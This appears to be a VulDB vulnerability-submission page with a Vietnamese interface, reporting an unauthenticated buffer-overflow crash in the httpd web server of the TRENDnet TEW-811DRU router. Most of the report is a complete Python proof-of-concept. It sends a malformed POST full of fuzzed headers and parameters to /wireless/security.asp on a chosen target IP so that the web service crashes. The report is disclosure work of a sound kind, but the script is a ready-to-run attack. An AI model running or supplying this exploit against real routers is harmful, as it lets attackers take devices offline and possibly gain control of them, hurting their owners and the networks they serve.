Gửi #76278: Web crash on TRENDnet router TEW-811DRUthông tin

tiêu đề	Web crash on TRENDnet router TEW-811DRU
Mô tả	# Overview * Type: memory corruption * Supplier: TRENDNet (https://www.trendnet.com/) * Product: TRENDNet TEW-811DRU (Version v1.0R) * Firmware download: https://downloads.trendnet.com/tew-811dru/firmware/fw_tew-811dru_v1(x.x.x.x).zip * Affect version: latest version x.x.x.x * Bug URL: http://192.168.10.1/wireless/security.asp # Description The web program 'httpd' processes all incoming requests. One malformed request could make 'httpd' crash. The vulnerability is easily exploited because it needn't either authentication or authorization. It allows a malicious attacker to crash the router and has the potential to control the router. # Reproduce and PoC ## Steps to Reproduce I have put the PoC code in the next section, configure 1 parameter and execute it, the device's web service will crash. The parameter is as below: - device_web_ip: web IP address of the target device. After executing the POC script, you will find the device web service is crashed: you can retry to visit the device's web through the browser or use telnet('telnet device_web_ip 80') to check. ## Proof of Concept Below is PoC written with python3, save the code into the script(exp.py) and execute it. ``` import requests,socket import re import time from urllib.parse import urlencode device_web_ip = '192.168.10.1' request = {'HEAD': {'Host': b'Z', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 'Accept': b',\x80gpsiation//xm', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': b'enc\xbc\xbc\xbc', 'Content-Length': '1209', 'Origin': 'http://x.x.x.x:8080', 'Connection': 'keep-alive', 'Referer': 'http://x.x.x.x:8080/wireless/security.asp', 'Cookie': 'expandable=3c', 'Upgrade-Insecure-Requests': b'\x1d2' }, 'PARAM': {b'ecOe': b'/wireless/srcuri\x81\x80.asp', b'\x86od}': 'Qy4zq80U9FFhnKc0BBTA', 'wl_wps_mode': b'd\x10saDte\x80', b'\x96\x96': b' 5', 'wl_bssid': b'SS', 'security_mode': b'OO:E', b'\x88l\x88l_eu_aZ': 0, 'wl_auth_mode': 'none', b'cc@@zw(': 'enabled', 'wl_akm': b'', 'wl_akm_wpa': b'b\x85nd', 'wl_akm_psk': 'disabled', 'wl_akm_wpa2': b'disniled', 'wl_akm_psk2': b'\xd3isabled', 'wl_wai_cert_index': '', 'wl_wai_cert_status': '', b'\x00\xffak\xffakvv_w': 'disabled', b'wkm_wl_akm_wapi\x05\xff\xff': 'disabled', 'wl_key': 2, b'\x01': 'abcde', b'wl{k@{': 'abcdefabcdefe', b'Sk': b'\x01\x8b\x00', b'7l_+ey': b'a\x80\x00\x00\x01\x8f', 'wl_macmode': b'a\x1c(\x1a\xc2\xba\x04\x00al', 'wl_maclist': 48, b'\x7fmmAc3t0t0': '00:0c:29:d9:40:fe', b'wl_mac\xc3\x8f?\xc3\x86\x045\x00\x80\x1b\xc3\x88\xc3\x96\xc3\xa4S\xc2\x96\xc2\x96$\x00Dh\xc3\xb4\xc3\x9flis\xc3\x8b\x0bX>\t\xc2\xaaQ\x03': '00:0c:29:d9:40:ff', b'glFqacKist2': b'2:0c\x8029::@BJ40!fd', b'lmaylistaclma': '', 'wl_maclist4': '', 'wl_maclist5': b'', b'wleAaclb\x7fg': b'', 'wl_maclist7': b'', b'l_++++wlP++++++*+': '', 'wl_maclist10': b'', 'wl_maclist11': b'', b'w\xff\xff\xee\xff\x86ist\x80\x002': b'', b'wl_wlcl\x05\xff\xff\x053': '', b'hl@\x81B_\x7f\xff\x00\xff14': b'', b'w@_maclis': '', 'wl_maclist16': b'', b'wU_maczist17': b'', 'wl_maclist18': b'', 'wl_maclist19': b'', b'w\xc2\x98\x0b$jl\x87mlym!cw\xc2\x98\x0b$jl\x87mlym!c\x9ai': b'', b'w\|\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1': b'', b'a\x00\x00\x02\x00': '', 'wl_maclist23': '', 'wl_maclist24': b'', b'\xa9\x14\twl_maclis\xa9\x14\twl_maclist2': '', 'wl_maclist26': b'', 'wl_maclist27': '', 'wl_maclist28': '', b'wl_l_m\xba\xba\xba\xba\xba\xba': b'', b'l\xff\xff\xfd\xff\xff': b'', 'wl_maclist31': b'', b'J': b'', b'wl_macli\xfft\x00\x02': b'', 'wl_maclist34': b'', 'wl_maclist35': '', b'\x8dlTmaclist36': '', 'wl_maclist37': '', 'wl_maclist38': '', 'wl_maclist39': '', 'wl_maclist40': '', b'sl_maclicl': '', b'\x90l': b'', b'wW_maclist4\xb3': '', 'wl_maclist44': b'', 'wl_maclist45': '', 'wl_maclist46': b'', 'wl_maclist47': b'', b'\x00\x08\x7f': 'Apply', 'wan_apply': '<!--#tr id=', 'mg.alert.7': '', 'wl_key4': b'Q', b'alg.alg.05': b'', 'wl_maclist15': b'', 'expandable': b'', b'\xff\xff\xff\xff45': 4 }, 'ATTR': {'URL': 'http://{}/wireless/security.asp'.format(device_web_ip), 'METHOD': 'POST', 'VERSION': 'HTTP/1.1' } } headers = request['HEAD'] params = request['PARAM'] method = request['ATTR']['METHOD'] url = request['ATTR']['URL'] try: r = requests.request(method=method,url=url,headers=headers,data=urlencode(params),verify=False,timeout=5) print('Finish attack, to check web state.') except Exception as e: print('error:{}'.format(e)) ```
Người dùng	leetsun (UID 39457)
Đệ trình	25/01/2023 12:34 (cách đây 3 những năm)
Kiểm duyệt	01/02/2023 14:39 (7 days later)
Trạng thái	được chấp nhận
Mục VulDB	219937 [TRENDnet TEW-811DRU 1.0.10.0 httpd /wireless/security.asp tràn bộ đệm]
điểm	17

◂ Trước Tổng Quan Tiếp theo ▸

Do you need the next level of professionalism?

Upgrade your account now!